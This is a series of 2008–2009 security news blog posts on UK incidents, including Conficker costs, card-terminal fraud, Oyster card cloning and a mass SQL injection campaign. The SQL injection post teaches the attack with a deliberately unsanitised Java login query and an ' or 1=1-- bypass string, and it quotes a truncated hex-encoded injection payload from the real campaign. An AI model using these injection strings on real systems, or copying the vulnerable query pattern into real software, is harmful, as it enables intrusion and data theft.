July 2nd, 2009

Manchester City Council pays $2.4m in Conficker clean up costs

Posted by Dancho Danchev @ 7:22 am

Categories: Anti Virus, Botnets, Governments, Hackers, Malware, Microsoft, Patch Watch, Pen testing, United Kingdom, Viruses and Worms

Tags: Infection, Patch Management, Worm, Conficker, Cyberthreats, Security, Patches, Viruses And Worms, Dancho Danchev

How severe can the impact of the Conficker worm be on a single city council that has apparently not implemented basic security solutions in place?

Pretty severe according to a recently released a report entitled “Service interruption resulting from ICT disruption in February 2009” which details the financial costs of a Conficker incident affecting Manchester City Council’s network - 1.5 million pounds in clean up costs and lost revenue from the downtime.

Where did all the money go, and can this incident cost be used as an average to draw conclusions from in the long term in respect to assessing Conficker’s financial impact on affected networks? Let’s find out.

Read the rest of this entry »

August 19th, 2008

Scammers caught backdooring chip and PIN terminals

Posted by Dancho Danchev @ 1:51 pm

Categories: Complex Attacks, Governments, Hackers, Passwords, United Kingdom, United States of America

Tags: Cybercrime, Credit Card Fraud, ATM Skimming, Banker Malware, Social Engineering, Dancho Danchev

The U.K’s Dedicated Cheque and Plastic Crime Unit (DCPU) have recently uncovered state of the art social engineering scheme, where once backdoored, chip and PIN terminals were installed at retailers and petrol stations in an attempt to steal the credit card details passing through. Originally, before online banking took place proportionally with the developments on the banker malware front, scammers used to take advantage of old-fashioned ATM skimming and fake keypad devices, which were installed at less popular locations due to the possibility of them getting caught. What this case demonstrates is that even trustworthy locations where you’d assume that a physical breach cannot take place that easily, remain vulnerable.

Read the rest of this entry »

July 30th, 2008

Gary McKinnon – 'world's most dangerous hacker' – to be extradited

Posted by Nathan McFeters @ 7:20 am

Categories: Governments, Hackers, United Kingdom, United States of America

Tags: Hacker, Gary McKinnon, Hacking, Security, Nathan McFeters

The Guardian, out of the United Kingdom, is reporting that Gary McKinnon, the “world’s most dangerous hacker”, will be extradited to the United States to face criminal hacking charges. McKinnon, a 42 year old unemployed systems administrator from north London, allegedly hacked into systems belonging to the US army, navy, air force, and Nasa in 2001. From the article:

He said he was merely searching for evidence of extraterrestrial life, but American officials labeled him the world’s most dangerous hacker and accused him of deleting important files and causing hundreds of thousands of dollars’ worth of damage.

According to prosecutors, McKinnon scanned more than 73,000 US government computers and hacked into 97 machines belonging to the US army, navy, air force and Nasa.

Read the rest of this entry »

July 29th, 2008

Passports worth £2.5 million stolen in van hijack

Posted by Nathan McFeters @ 7:02 am

Categories: Data theft, Governments, Privacy, United Kingdom

Tags: Passport, Van, Security, Nathan McFeters

Graham Tibbetts of the UK Telegraph is reporting that the British Foreign Office has admitted to losing around 3,000 passports and visa stickers, which were stolen on their way from Manchester to RAF Northolt in London, where they were to be sent to British embassies.  From the article:

Officials claimed the chip technology incorporated in the passports would prevent them being used.

But fraud experts said they could be easily cloned and sold on the black market.

Read the rest of this entry »

July 25th, 2008

Britain moves against illegal file sharing

Posted by Nathan McFeters @ 11:02 am

Categories: Governments, United Kingdom, United States of America

Tags: File-sharing, Peer To Peer (P2P), Internet Service Providers (ISPs), Internet, Nathan McFeters

CBC News out of Canada is reporting that British ISPs are making an aggressive move against illegal file sharing by implementing a program designed to discover copyright violators, who will be sent warning letters and may potentially have their internet connections disconnected.

For more on the article, read below.

Read the rest of this entry »

July 16th, 2008

Big Brother Getting Bigger Part 2: United Kingdom

Posted by Nathan McFeters @ 8:32 am

Categories: Big Brother Getting Bigger, Digital rights management, Governments, Part 1: USA, Part 2: UK, Privacy, United Kingdom, United States of America, ~Special Series~

Tags: Phone, Mr., Data Communications Bill, Internet, Storage, Databases, Telecom & Utilities, Hardware, Enterprise Software, Software

In a move to bring direct competition to the US on who can be the bigger, badder, more blatant Big Brother, the United Kingdom has apparently decided to create a database holding the telephone numbers and email accounts of everyone in Britain.  The details of every phone conversation, SMS, and email, as well as cellphone internet traffic would be held in the database for 12 months.

From a story by Christopher Hope, Home Affairs Editor for telegraph.co.uk:

Gordon Brown signaled plans to bring in the database holding details of every phone call, email and time spent on the internet by the public in last month’s draft Queen’s Speech.

The proposal is part of Government plans to implement a European Union directive which was brought in after the 7 July bombings to encourage uniform record-keeping across EU states.

I find it chilling how each of these major infractions on civil rights validates itself with some previous tragedy; however, it’s actually somewhat refreshing to know that we aren’t the only country going to such ridiculous measures.

Read the rest of this entry »

July 8th, 2008

U.K's most spammed person receives 44,000 spam emails daily

Posted by Dancho Danchev @ 7:40 am

Categories: Botnets, Governments, Spam and Phishing, United Kingdom

Tags: ClearMyMail, S.P.A.M experiment, Dancho Danchev

When you get so much spam that your anti-spam provider decides to use you in a marketing campaign, your spam problem turns into an asset for the community, and researchers running honeypots can only envy you for the sample of spam emails you receive on a daily basis. According to a recent press release by ClearMyMail :

“ClearMyMail, has today announced the UK’s Top 5 most spammed email accounts that it protects, receiving a total of 3,900 – 44,000 spam emails each day. Three of these customers have an Orange ISP and in total have around 63,339 spam emails blocked every day and 23,118,735 spam emails blocked every year.

1 – 44,001 emails blocked per day - Orange ISP
2 – 13,578 – Orange ISP
3 – 12,428 – Private domain using 123-reg/GX Networks
4 – 5,760 – Orange ISP
5 – 3,982 – Private domain using 123-reg/GX Networks

Orange customer, Colin Wells – Workshop Foreman for Stagecoach buses – has the most spammed UK inbox and ClearMyMail blocks more than 44,000 emails from entering Wells’ inbox every day, amounting to around 16 million every year.”

Not even McAfee’s 30 days S.P.A.M experiment can come up with such good results, where 3 users receive 63,339 spam emails daily and 23,118,735 every year, mostly because these folks have been interacting with the spam messages for the past couple of years.

June 26th, 2008

Security researchers hack the London underground train for free ride

Posted by Nathan McFeters @ 7:22 pm

Categories: Complex Attacks, Dutch, Governments, Hackers, RFID, United Kingdom, Vulnerability research, Wireless, Zero-day attacks

Tags: Card, Smart Card, Researcher, Smart Cards, Security, Nathan McFeters

A group of Dutch security researchers were able to clone the “smartcards” that commuters use to pay fares in the London Underground system, allowing the group to ride for free.  This is an interesting attack vector that I actually talked to Adam Laurie about when I was at Black Hat Amsterdam.  I’ve spoken about similar hacks with a number of security researchers, and there’s been some interesting ideas proposed on the subject.  In fact, I may just try this on the laundry cards used in my apartment complex.  I promise a full write up on how it was done if I manage to pull something off.

I originally saw this story commented on in an article on Wired by Alexander Lew, which commented that:

There are more than 17 million of the transit cards, called Oyster Cards, in circulation. Transport for London says the breach poses no threat to passengers and “the most anyone could gain from a rogue card is one day’s travel.” But this is about more than stealing a free fare or even cribbing any personal information that might be on the cards.

Oyster Cards feature the same Mifare chip used in security cards that provide access to thousands of secure locations. Security experts say the breach poses a threat to public safety and the cards should be replaced.

 ”The cryptography is simply not fit for purpose,” security consultant Adam Laurie told the Telegraph. “It’s very vulnerable and we can expect the bad guys to hack into it soon if they haven’t already.”

For those not familiar, Adam Laurie is a major player in the computer security research field and has done a ton of interesting research on all number of wireless technology.  I’m working on getting Adam to write up a guest editorial or two on what he’s been working on lately. 

Read on…

[Images courtesy of Transport For London]

Read the rest of this entry »

April 28th, 2008

Developers at fault? SQL Injection attacks lead to wide-spread compromise of IIS servers

Posted by Nathan McFeters @ 1:51 pm

Categories: Browsers, Exploit code, Governments, Hackers, Microsoft, United Kingdom, United States of America, Viruses and Worms, Vulnerability research, Zero-day attacks

Tags: Developer, Password, Web Application, Server, SQL, Site, SQL Injection, Microsoft IIS Server, Attack, Programming Languages

There’s been a lot of noise and violent thrashing over the last couple days regarding a flaw that was originally believed to be a flaw in Microsoft’s IIS (Internet Information Server), but has since been pointed out as simply a well thought out SQL Injection attack. 

For those of you who aren’t familiar with SQL Injection attacks, it’s a pretty well known web application attack vector that exists in high volume on dynamic applications, say for instance, on your banking site.  SQL Injection allows an attacker to subvert the logic of the currently running SQL query in order to interact with data more interesting to the attacker, bypass authentication/authorization, or run arbitrary commands on the operating system of the database server.  Here’s an example of the attack:

1.) Imagine a web application, such as a banking application, that has a login page.  When logging in, the application will take the username and password that you supply and query a database table of users that it knows about.  Basically, if your username and password match entries within the database, then you’ll be authenticated.  

2.) When a query is created dynamically, and uses user-supplied input (the username and password), without sanitizing them or running them through a parameterized query class, then SQL Injection is possible. 

3.) The code might look something like the follows (this will be roughly Java like, but you can extend it to your language):

String query = new String(”select * from USERS_TBL where username=’” + request.getParameter(”username”) + “‘ and password = ‘” + request.getParameter(”password”) + “‘;”);

// create the connection and statement, details left out as they are unimportant

Connection con = new Connection(…);  Statement stmt = new Statement(…);

stmt.executeQuery(query);

4.) Now, if you look in that code, you’ll notice that the query is constructed with dynamic parameters (username and password) that are pulled in from the request object (basically pulling them out of the query string from a request) and put between a set of single quotes.

5.) If I inject something the application doesn’t expect, for instance ‘ or 1=1–, the application will execute the SQL code as is:

select * from USERS_TBL where username = ” or 1=1– and password = ”;

Basically, I’ve forced the query into a conditional statement that will always be true.  The username will be blank, or 1=1 (which is true of course), and since this is an or statement with an always true value, this statement will always be true… well guess what?  Now I’ve logged into the application as an authenticated user.

6.) SQL Injection is much more dangerous than this in fact, as I can typically pull out all information from all tables (including social security numbers, account numbers, etc.), and in some cases, like in Microsoft SQL server, I may be able to execute arbitrary commands (xp_cmdshell). This might also be used to insert data into relevant tables (like it appears to have been used here), where an attacker might insert data that would later get rendered in the context of the victims browser. Imagine deploying a browser based attack vector in conjunction with SQL Injection. Infect 100s of thousands of sites, infect millions of users.

Obviously this is really bad.  Would you be suprised if I told you it was pretty common place to discover these types of flaws in a web application assessment?  In any case, back to the matter at hand which is this wide-scale compromise (estimated at over a half-million sites) of Microsoft IIS servers.  Sunnet Beskerming, a blogger that I read often, commented on this story as follows:

Although there has been a new IIS vulnerability disclosed in recent weeks, the attacks are only making use of poor site and database maintenance practices - using SQL injection to exploit sites.

For site visitors who visit an affected site, JavaScript is used to try and download / run malware that then targets a number of commonly used technologies in order to gain full control over the system.

It goes to show that input validation is a critical component of the security picture for a site and it is a problem that is still not being properly addressed by many sites, including a lot that should know better.

In one simple set of attacks, previously trustworthy sites can now no longer be considered trustworthy and it is another blow to services that tout their ability to mark a site as being ‘Hacker Safe’ or otherwise safe for visiting (like SiteAdvisor).

Bill Sisk of Microsoft has also commented on the issue:

There have been conflicting public reports describing a recent rash of web server attacks. I want to bring some clarification about the reports and point you to the IIS blog for additional information.

To begin with, our investigation has shown that there are no new or unknown vulnerabilities being exploited. This wave is not a result of a vulnerability in Internet Information Services or Microsoft SQL Server. We have also determined that these attacks are in no way related to Microsoft Security Advisory (951306). 

The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies. SQL injection attacks enable malicious users to execute commands in an application’s database.  To protect against SQL injection attacks the developer of the Web site or application must use industry best practices outlined here.  Our counterparts over on the IIS blog have written a post with a wealth of information for web developers and IT Professionals can take to minimize their exposure to these types of attacks by minimizing the attack surface area in their code and server configurations. Additional information can be found here: http://blogs.iis.net/bills/archive/2008/04/25/sql-injection-attacks-on-iis-web-servers.aspx

It sounds like, at least from reading several sources such as Dancho Danchev and Ronald van den Heetkamp’s blogs, that this is a SQL Injection attack that actually inserts a malicious JavaScript payload that will then be rendered into victim’s browsers.  Victim’s who then view the subsequent pages will be hit with Cross-site scripting like attacks that try to force them to download malware, etc.  It could just as easily (probably should’ve been) incorporated with something like the latest QuickTime flaw(s) or some of the URI abuse research that I’ve been involved with. Now you can hit millions of users with attack vectors.

What is scarriest about this attack is that it appears that the group doing the attacking has found a few very reliable attack vectors for SQL Injection… honestly, it’s likely even more damage could’ve been done, such as scouring the information out of all of these databases, deleting the databases all together, etc.

Interesting stuff… really shows how serious web application flaws are these days.  Good thing we have that strong PCI certification process recommending we have all of our applications go through at a minimum a black box security review… oh wait, that’s right, they suggested web application firewalls.  Well, at least web application firewalls are decent at preventing SQL Injections, right?  Umm… well, don’t you think that some of the following sites use a WAF and all that’s available to them:

• The UK government web pages
• United Nations web pages
• The Department of Homeland Security
• etc.

Maybe it’s because the attackers encode the attack funky-like (from Ronald van den Heetkamp’s blog):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×4400450043004C0041005200450020004000540020007
600610072006300680061007200280032003500350029002
C00400043002000760061007200630068006100720028003
20035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007
200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D002700750027002
00061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007
900700065003D003300350020006…

Decoded:
DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name’b.name from sysobjects a’syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35
or b…

So end result is, looks like another case of bad programming for now, on the side of developers of the vulnerable applications, not Microsoft.  More to come when I hear more.

-Nate

April 22nd, 2008

Websense: UN, UK sites compromised by JavaScript injection

Posted by Larry Dignan @ 7:03 pm

Categories: Exploit code, Governments, Hackers, United Kingdom, Vulnerability research

Tags: JavaScript, Injection, Websense Inc., Attack, Scripting Languages, Security, Software/Web Development, Web Development, Larry Dignan

Websense on Tuesday said that the UN and UK government sites are being attacked in a mass JavaScript injection attack.

According to Websense:

Websense Security Labs has been tracking a recent development of the malicious JavaScript injection that compromised thousands of domains at the start of this month, just 2-3 weeks ago. The attackers have now switched over to a new domain as their hub for hosting the malicious payload in this attack. We have no doubt that the two attacks are related as our brief analysis below will explain. In the last few hours we have seen the number of compromised sites increase by a factor of ten.

This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.

Is it just me or are hack attacks against governments becoming the norm?